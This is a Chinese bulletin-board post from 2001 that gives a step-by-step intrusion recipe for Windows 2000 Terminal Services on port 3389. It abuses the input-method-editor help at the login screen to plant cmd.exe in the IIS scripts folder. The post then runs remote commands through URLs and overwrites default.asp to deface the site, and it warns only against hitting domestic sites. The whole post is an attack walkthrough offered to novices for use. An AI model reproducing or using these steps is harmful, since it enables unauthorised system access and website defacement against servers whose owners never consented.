computer 版 (精华区)

发信人: sdrizzle (小雨), 信区: network
标  题: WIN2000输入法入侵--3389端口的入侵
发信站: 听涛站 (Thu Feb  8 20:14:54 2001), 转信

其实，许多win2000还有3389漏洞，如果你是菜鸟，对unicode什么的不明白，那么看看
这篇：
一次win2000的3389端口的入侵
　 windows2000的终端服务程序是以图开界面远程访问主机的3389端口，而微软的wind
ows2000的输入法漏洞打了补丁后还是存在很多这样那样的遗漏。下面以实例加以说明远
程入侵一台主机。
　 1、用端口扫瞄程序扫IP的3389端口，得到xx.xx.xx.xx。
　 2、运行windows2000终端客户程序，在服务器输入框里填入：xx.xx.xx.xx ，连接。

　 3、出现windows2000的登陆窗口，按下CTRL+SHIFT键，出现全拼输入法。
　 4、在输入法状态条上按mouse右键，选择帮助，选择输入指南，选择"选项"按右键。

　 5、选择"跳转到URL"，输入：c:\winnt\system32\cmd.exe.
　 6、选择"保存到磁盘"。
　 7、选择目录：c:\inetpub\scripts\
　 8、打开IE，输入：xx.xx.xx.xx/scripts/cmd.exe?/c+dir+c:\ （知道了吧）
　 9、输入：xx.xx.xx.xx/scripts/cmd.exe?/c+echo+BEIJING+>c:\inetpub\wwwroot\
default.asp
　 这是一个简单的例子，同志们可别用来对付国内的站点，因为这样的漏洞实在太多。

黑白的远程控制中有windows2000的终端服务程序下载

--
What is love ?
Love means that you don't have to say "sorry",ever.

※ 来源:．听涛站 cces.net．[FROM: 匿名天使的家]